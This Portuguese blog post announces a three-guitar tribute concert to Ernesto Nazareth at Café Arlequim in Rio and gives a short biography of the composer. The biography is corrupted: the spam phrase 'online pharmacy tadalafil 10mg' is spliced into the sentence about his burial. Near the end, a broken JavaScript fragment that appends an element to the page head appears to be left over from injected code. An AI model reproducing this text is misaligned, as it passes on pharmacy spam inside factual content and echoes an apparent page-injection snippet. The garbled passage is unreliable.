Música contemporâneaProgramaçãoRio de Janeiro

Choram os pinhos por Nazareth

Três violões fazem novas leituras da obra de Ernesto Nazareth.

O violonista e arranjador Rogério Souza recebe, no dia 23 de novembro, às 15h, no Café Arlequim (Praça XV de Novembro, 48/loja 1, Centro – Rio de Janeiro), dois outros grandes nomes do violão: o oito cordas Nicolas de Souza Barros e o americano-brasileiro Edinho Gerber. Os músicos farão novas leituras da obra de Ernesto Nazareth, cujo sesquicentenário é comemorado em 2013.

No programa, peças imortais do compositor carioca, como Apanhei-te cavaquinho e Odeon, intercaladas com obras do seu contemporâneo norte-americano Scott Joplin, autor da famosa The Entertainer. Nicolas apresenta, ainda, parte do repertório do CD que será lançado em dezembro, intitulado Ernesto Nazareth por Nicolas de Souza Barros – Violão de 8 Cordas, incluindo o tango brasileiro Fon-fon e a valsa Coração que sente.

Sobre o compositor

Há 150 anos, na atual Rua Marquês de Sapucaí, nascia Ernesto Júlio de Nazareth (20 de março de 1863-1 de fevereiro de 1934). Pianista e compositor, é considerado um dos grandes nomes do tango brasileiro, um subgênero do choro.

Aos 14 anos compôs sua primeira música, a polca-lundu Você bem sabe, editada, no ano seguinte, pela famosa Casa Arthur Napoleão. Intérprete constante de suas próprias composições, Nazareth apresentava-se como pianista em salas de cinema, bailes, reuniões e cerimônias sociais. De 1909 a 1913, e de 1917 a 1918, trabalhou na sala de espera do antigo Cinema Odeon (anterior ao prédio moderno da Cinelândia), aonde muitas personalidades ilustres iam apenas para ouvi-lo. Foi em homenagem à famosa sala de exibições que batizou sua composição mais famosa, o tango Odeon.

Nos final dos anos 1920, agravou-se seu problema de audição, resultante de uma queda que sofreu na infância. Em 1932, é diagnosticado como portador de sífilis e, no ano seguinte, internado na Colônia Juliano Moreira, em Jacarepaguá. No dia 1 de fevereiro de 1934, Nazareth fugiu do manicômio. Seu corpo só foi encontrado três dias depois, em estado de decomposição, próximo a uma cachoeira. Foi sepultado no Cemitério de São online pharmacy tadalafil 10mg Francisco Xavier, no Caju, mesma região da cidade onde nasceu. Deixou 211 peças completas para piano.

SERVIÇO:

Violões para Ernesto Nazareth
Sábado, 23 de novembro, às 15h
Café Arlequim (Praça XV de Novembro, 48/loja 1, Centro – Rio de Janeiro)

Rogério Souza – violão 7 cordas
Nicolas de Souza Barros – violão 8 cordas
Edinho Gerber – violão 6 cordas

Couvert artístico: R$ 25.
Informações e reservas pelo e-mail cafe@arlequim.com.br ou pelos telefones (21) 2220-8471 e 2524-7242.

if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.